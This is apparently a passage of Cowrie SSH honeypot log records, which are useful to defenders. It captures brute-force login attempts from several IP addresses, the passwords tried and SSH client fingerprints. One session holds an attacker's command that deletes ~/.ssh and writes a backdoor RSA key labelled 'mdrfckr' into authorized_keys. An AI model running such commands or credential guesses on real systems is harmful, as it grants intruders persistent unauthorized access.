{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:43:52.164687Z","src_ip":"192.227.168.133","session":"aef36c784889"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T11:43:52.889236Z","src_ip":"192.227.168.133","session":"aef36c784889"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:43:54.062070Z","src_ip":"192.227.168.133","session":"aef36c784889"}
{"eventid":"cowrie.session.connect","src_ip":"192.227.168.133","src_port":44884,"dst_ip":"1.2.3.4","dst_port":22,"session":"6dede19a7d54","protocol":"ssh","message":"New connection: 192.227.168.133:44884 (1.2.3.4:22) [session: 6dede19a7d54]","sensor":"my-vps","timestamp":"2025-08-28T11:43:54.239306Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:43:54.239951Z","src_ip":"192.227.168.133","session":"6dede19a7d54"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:43:54.415436Z","src_ip":"192.227.168.133","session":"6dede19a7d54"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:43:55.159591Z","src_ip":"192.227.168.133","session":"6dede19a7d54"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:43:55.334379Z","src_ip":"192.227.168.133","session":"002175b7be41"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:43:55.336405Z","src_ip":"192.227.168.133","session":"6dede19a7d54"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59714,"dst_ip":"1.2.3.4","dst_port":22,"session":"bff43a5b24da","protocol":"ssh","message":"New connection: 212.227.125.160:59714 (1.2.3.4:22) [session: bff43a5b24da]","sensor":"my-vps","timestamp":"2025-08-28T11:44:00.606920Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:44:00.607745Z","src_ip":"212.227.125.160","session":"bff43a5b24da"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:44:00.790354Z","src_ip":"212.227.125.160","session":"bff43a5b24da"}
{"eventid":"cowrie.login.failed","username":"guest","password":"123123","message":"login attempt [guest/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T11:44:01.563735Z","src_ip":"212.227.125.160","session":"bff43a5b24da"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":53091,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc680087d60c","protocol":"ssh","message":"New connection: 80.94.95.15:53091 (1.2.3.4:22) [session: dc680087d60c]","sensor":"my-vps","timestamp":"2025-08-28T11:44:02.290337Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T11:44:02.291057Z","src_ip":"80.94.95.15","session":"dc680087d60c"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T11:44:02.342702Z","src_ip":"80.94.95.15","session":"dc680087d60c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"k3s601","message":"login attempt [admin/k3s601] failed","sensor":"my-vps","timestamp":"2025-08-28T11:44:02.629011Z","src_ip":"80.94.95.15","session":"dc680087d60c"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:44:02.889921Z","src_ip":"212.227.125.160","session":"bff43a5b24da"}
{"eventid":"cowrie.login.failed","username":"admin","password":"net02net","message":"login attempt [admin/net02net] failed","sensor":"my-vps","timestamp":"2025-08-28T11:44:03.682834Z","src_ip":"80.94.95.15","session":"dc680087d60c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1212","message":"login attempt [admin/1212] failed","sensor":"my-vps","timestamp":"2025-08-28T11:44:04.736402Z","src_ip":"80.94.95.15","session":"dc680087d60c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1q2w3e4r","message":"login attempt [admin/1q2w3e4r] failed","sensor":"my-vps","timestamp":"2025-08-28T11:44:05.789264Z","src_ip":"80.94.95.15","session":"dc680087d60c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"51Dd7DRv5i2X","message":"login attempt [admin/51Dd7DRv5i2X] failed","sensor":"my-vps","timestamp":"2025-08-28T11:44:06.842915Z","src_ip":"80.94.95.15","session":"dc680087d60c"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:44:07.896818Z","src_ip":"80.94.95.15","session":"dc680087d60c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48302,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f902fd884bd","protocol":"ssh","message":"New connection: 212.227.125.160:48302 (1.2.3.4:22) [session: 2f902fd884bd]","sensor":"my-vps","timestamp":"2025-08-28T11:44:25.832921Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:44:25.833728Z","src_ip":"212.227.125.160","session":"2f902fd884bd"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T11:44:25.892972Z","src_ip":"212.227.125.160","session":"2f902fd884bd"}
{"eventid":"cowrie.login.failed","username":"solv","password":"solv","message":"login attempt [solv/solv] failed","sensor":"my-vps","timestamp":"2025-08-28T11:44:26.133967Z","src_ip":"212.227.125.160","session":"2f902fd884bd"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:44:27.196243Z","src_ip":"212.227.125.160","session":"2f902fd884bd"}
{"eventid":"cowrie.session.connect","src_ip":"222.124.17.227","src_port":54858,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f87e229cc57","protocol":"ssh","message":"New connection: 222.124.17.227:54858 (1.2.3.4:22) [session: 0f87e229cc57]","sensor":"my-vps","timestamp":"2025-08-28T11:44:31.588561Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:44:31.589334Z","src_ip":"222.124.17.227","session":"0f87e229cc57"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:44:31.798285Z","src_ip":"222.124.17.227","session":"0f87e229cc57"}
{"eventid":"cowrie.login.success","username":"root","password":"Pa$$w0rd.2018","message":"login attempt [root/Pa$$w0rd.2018] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:44:32.673933Z","src_ip":"222.124.17.227","session":"0f87e229cc57"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:44:33.111680Z","src_ip":"222.124.17.227","session":"0f87e229cc57"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:44:33.112382Z","src_ip":"222.124.17.227","session":"0f87e229cc57"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:44:33.113547Z","src_ip":"222.124.17.227","session":"0f87e229cc57"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:44:33.323855Z","src_ip":"222.124.17.227","session":"0f87e229cc57"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:44:33.801845Z","src_ip":"222.124.17.227","session":"0f87e229cc57"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T11:44:33.802545Z","src_ip":"222.124.17.227","session":"0f87e229cc57"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T11:44:34.013633Z","src_ip":"222.124.17.227","session":"0f87e229cc57"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:44:34.014509Z","src_ip":"222.124.17.227","session":"0f87e229cc57"}
{"eventid":"cowrie.session.connect","src_ip":"222.124.17.227","src_port":55444,"dst_ip":"1.2.3.4","dst_port":22,"session":"091392f7d805","protocol":"ssh","message":"New connection: 222.124.17.227:55444 (1.2.3.4:22) [session: 091392f7d805]","sensor":"my-vps","timestamp":"2025-08-28T11:44:34.189034Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:44:34.189857Z","src_ip":"222.124.17.227","session":"091392f7d805"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:44:34.381089Z","src_ip":"222.124.17.227","session":"091392f7d805"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T11:44:35.186065Z","src_ip":"222.124.17.227","session":"091392f7d805"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:44:36.380004Z","src_ip":"222.124.17.227","session":"091392f7d805"}
{"eventid":"cowrie.session.connect","src_ip":"222.124.17.227","src_port":55944,"dst_ip":"1.2.3.4","dst_port":22,"session":"c64b5a8dbe5e","protocol":"ssh","message":"New connection: 222.124.17.227:55944 (1.2.3.4:22) [session: c64b5a8dbe5e]","sensor":"my-vps","timestamp":"2025-08-28T11:44:36.592252Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:44:36.593228Z","src_ip":"222.124.17.227","session":"c64b5a8dbe5e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:44:36.805858Z","src_ip":"222.124.17.227","session":"c64b5a8dbe5e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:44:37.696948Z","src_ip":"222.124.17.227","session":"c64b5a8dbe5e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:44:37.911211Z","src_ip":"222.124.17.227","session":"c64b5a8dbe5e"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:44:37.925477Z","src_ip":"222.124.17.227","session":"0f87e229cc57"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47076,"dst_ip":"1.2.3.4","dst_port":22,"session":"78c13fc4e4e0","protocol":"ssh","message":"New connection: 212.227.125.160:47076 (1.2.3.4:22) [session: 78c13fc4e4e0]","sensor":"my-vps","timestamp":"2025-08-28T11:44:42.636173Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:44:42.636939Z","src_ip":"212.227.125.160","session":"78c13fc4e4e0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nis